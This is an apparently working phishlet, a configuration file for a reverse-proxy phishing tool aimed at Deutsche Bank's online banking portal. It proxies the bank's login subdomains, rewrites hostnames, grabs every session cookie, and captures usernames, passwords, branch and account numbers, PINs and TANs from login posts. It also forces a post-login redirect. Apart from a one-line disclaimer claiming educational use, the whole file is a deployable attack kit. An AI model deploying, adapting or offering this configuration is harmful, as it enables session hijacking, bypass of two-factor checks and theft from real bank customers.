# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET. 

author: '@ANON'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'meine', orig_sub: 'meine', domain: 'deutsche-bank.de', session: true, is_landing: true}
  - {phish_sub: '', orig_sub: '', domain: 'deutsche-bank.de', session: true, is_landing: false}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'deutsche-bank.de', session: true, is_landing: false}
  - {phish_sub: 'tp', orig_sub: 'tp', domain: 'deutsche-bank.de', session: true, is_landing: false}
  - {phish_sub: 'wob', orig_sub: 'wob', domain: 'deutsche-bank.de', session: true, is_landing: false}
  - {phish_sub: 'www.xmarkets', orig_sub: 'www.xmarkets', domain: 'db.com', session: true, is_landing: false}
  - {phish_sub: 'push.xmarkets', orig_sub: 'push.xmarkets', domain: 'db.com', session: true, is_landing: false}
  - {phish_sub: '849715076759606', orig_sub: '849715076759606', domain: 'mateti.net', session: true, is_landing: false}
  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'mateti.net', session: true, is_landing: false}
  - {phish_sub: 't', orig_sub: 't', domain: 'mateti.net', session: true, is_landing: false}


sub_filters:
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'meine', domain: 'deutsche-bank.de', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'meine', domain: 'deutsche-bank.de', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'meine', domain: 'deutsche-bank.de', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '', domain: 'deutsche-bank.de', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '', domain: 'deutsche-bank.de', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '', domain: 'deutsche-bank.de', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '', domain: 'deutsche-bank.de', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'www', domain: 'deutsche-bank.de', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'www', domain: 'deutsche-bank.de', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'www', domain: 'deutsche-bank.de', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'tp', domain: 'deutsche-bank.de', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'tp', domain: 'deutsche-bank.de', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'tp', domain: 'deutsche-bank.de', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'wob', domain: 'deutsche-bank.de', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'wob', domain: 'deutsche-bank.de', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'wob', domain: 'deutsche-bank.de', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'www.xmarkets', domain: 'db.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'www.xmarkets', domain: 'db.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'www.xmarkets', domain: 'db.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '', domain: 'db.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'push.xmarkets', domain: 'db.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'push.xmarkets', domain: 'db.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'push.xmarkets', domain: 'db.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '849715076759606', domain: 'mateti.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '849715076759606', domain: 'mateti.net', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '849715076759606', domain: 'mateti.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: '', domain: 'mateti.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'cdn', domain: 'mateti.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'cdn', domain: 'mateti.net', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 'cdn', domain: 'mateti.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 't', domain: 'mateti.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 't', domain: 'mateti.net', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'meine.deutsche-bank.de', orig_sub: 't', domain: 'mateti.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
    
    

 
auth_tokens:
  - domain: '.deutsche-bank.de'
    keys: ['.*,regexp']    
auth_urls:
  - '/trxm/db/invoke'

credentials:
  username:
    key: 'emailaddress'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
  custom: 
    - key: 'branch'
      search: '(.*)'
      type: 'post'
    - key: 'account'
      search: '(.*)'
      type: 'post'  
    - key: 'subaccount'
      search: '(.*)'
      type: 'post'
    - key: 'pin'
      search: '(.*)'
      type: 'post'
    - key: 'sessionTAN'
      search: '(.*)'
      type: 'post'
    - key: 'tan'
      search: '(.*)'
      type: 'post'   
    - key: 'method'
      search: '(.*)'
      type: 'post'      
force_post:
  - path: '/trxm/db/gvo/login/login.do'
    search: 
      - {key: 'branch', search: '.*'}
      - {key: 'account', search: '.*'}
      - {key: 'subaccount', search: '.*'}      
    force:
      - {key: 'quickLink', value: 'DisplayFinancialOverview'}
    type: 'post'

login:
  domain: 'meine.deutsche-bank.de'
  path: '/trxm/db/'




# /trxm/db/invoke/26994f4f/main/banking$1.0@trxm.InstantPayment(db)/@@default